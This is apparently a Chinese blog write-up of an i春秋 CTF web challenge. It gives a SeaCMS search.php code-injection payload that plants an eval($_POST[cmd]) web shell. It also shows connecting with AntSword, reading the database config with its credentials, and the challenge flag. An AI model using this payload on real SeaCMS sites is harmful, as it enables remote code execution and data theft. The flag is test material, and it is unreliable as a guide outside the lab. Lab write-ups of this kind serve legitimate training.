i春秋-Test

Manba_772024-05-12 10:31

题目


解题

参考WP

复制代码 
https://blog.csdn.net/qq_40654505/article/details/107142533/

目录扫描

复现wp

payload为:

复制代码 
search.php?searchtype=5&tid=&area=eval($_POST[cmd])

使用蚁剑连接

复制代码 
http://eci-2ze4iyhwj7xvb68bsb2t.cloudeci1.ichunqiu.com:80/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

cmd

找到数据库配置文件,/var/www/html/data/common.inc.php

复制代码 
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库


复制代码 
flag{d2317097-0b48-4bbc-a968-90ec76ac67ea}
相关推荐
pandarking43 分钟前
[CTF]攻防世界:Shrin(SSTI)
web安全
Z3r4y2 小时前
【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析
java·web安全·ruoyi·代码审计·thymeleaf
jenchoi4133 小时前
【2025-12-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全·npm
白帽黑客-晨哥3 小时前
零基础系统学习渗透测试路线图
学习·网络安全·渗透测试·护网行动·产教融合·湖南省网安基地
咨询QQ276998853 小时前
COMSOL模拟蛇形流道PEMFC:多因素考量下的探索之旅
网络安全
咨询QQ180809514 小时前
探索COMSOL电晕放电现象:离子风生成与作用机制
web安全
-曾牛4 小时前
深入解析 XSS 漏洞:原理、分类与攻防实战
前端·安全·web安全·网络安全·渗透测试·xss·原理解析
XH-hui5 小时前
【打靶日记】VulNyx 之 Responder
linux·网络安全·vulnyx
pandarking6 小时前
[CTF]攻防世界:easytornado
web安全·ctf
vortex56 小时前
基于 Apache 规则拦截目录扫描器请求:实测与配置指南
linux·网络安全·apache
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)06本地部署阿里最新开源的Z-Image07Linux下V2Ray安装配置指南08Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽09Labelme从安装到标注:零基础完整指南10【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连